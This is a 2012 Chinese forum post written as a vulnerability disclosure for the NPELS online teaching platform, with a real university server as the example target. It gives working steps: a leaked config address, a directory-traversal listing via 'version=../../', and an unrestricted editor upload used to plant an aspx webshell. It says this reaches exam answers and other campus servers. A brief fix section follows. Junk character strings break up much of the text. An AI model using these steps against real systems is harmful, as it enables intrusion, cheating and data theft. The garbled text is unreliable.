找回密码
 立即注册
查看: 2676|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
. b6 r4 h' a: r4 ^6 P1 g4 Y
/ y" l) N5 Y0 |3 Y2 Q  n4 q0 f# |, x详细说明:0 I+ `: r! _. K+ ~5 s  q

& m* |9 |* d" I/ K% E& D1 y& @以南开大学的为例: 3 q9 a+ U- L7 E) A
http://222.30.60.3/NPELS
2 V' T; V# @% i& f+ {/ P( U9 N# mNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
7 j0 e1 E; L  E: L# H  H: _<setting name="Update_CommonSvr_CommonService" serializeAs="String">
$ c5 p5 |: a' H" Q" h<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
" L1 a4 M- ^# N( @: U/ F</setting>
% Q* X) C6 n  n, @! D! s及版本号% g3 k# E0 v$ b8 G( u% M
<add key="TVersion" value="1, 0, 0, 2187">' [8 a/ k% Z$ R1 P- D- k( x7 B
</add>4 s. p) C8 M, L5 }
直接访问# Q; V6 ^" V9 Q' m( T% D2 }
http://222.30.60.3/NPELS/CommonService.asmx( K& z: @9 A$ h+ ?8 l$ }
使用GetTestClientFileList操作,直接 HTTP GET 列目录:( L1 u) r) C' }4 _7 A
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21874 d6 y! d1 p. I4 l( ~) L+ c
进一步列目录(返回的网页很大,可以直接 wget 下来)
/ a7 U' Z6 S& o5 qhttp://222.30.60.3/NPELS/CommonS ... List?version=../../! [7 e7 @9 y9 r& A" b
/ p2 j1 D7 G* M1 `) Q
发现0 F7 t  @' _7 q( f6 E- z1 }
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm5 I' C; W% a% q- `! }9 y
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
. r0 W5 {* D2 l' J6 |! b上传后继续列目录找到木马地址直接访问即可
' A- t. ]& H3 e7 C4 J2 {, [ 9 o; p; f  q+ p& B9 d
OOXX
& v0 i* ], d5 [3 p  a  s; x# Z* v
+ v7 H: Z1 ^# T  T8 mGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
3 C4 U: }# m/ j. B漏洞证明:
6 r% q# l, E, L7 [3 j , A1 |" N& U/ X) ~+ k" R8 i
列目录:" `1 `1 @9 k6 Z" a
http://222.30.60.3/NPELS/CommonS ... List?version=../../- N- w; m7 h6 t
文件上传:
# \* ~( ^7 F/ C7 r& e( xhttp://222.30.60.3/npelsv/editor/editor.htm$ A( r5 L! @6 t) S  \
7 B" w: _% q7 z/ R+ C
上传木马:
( m* t8 _" W2 L# l  z2 Bhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx: I. O8 R& E1 U5 ^( y8 n( |
8 i  V0 S" Q% {4 @  [1 I6 b; j" x
修复方案:
* u) c+ g- w1 q6 s: n$ S好像考试系统必须使用 CommonService.asmx) f: D, F+ g1 f9 c: ]
最好配置文件加密或者用别的方式不让它泄露出来) a$ d. S2 o  w( G0 r" N/ _
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​: }2 Y4 s8 R! E5 f: B, w6 H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表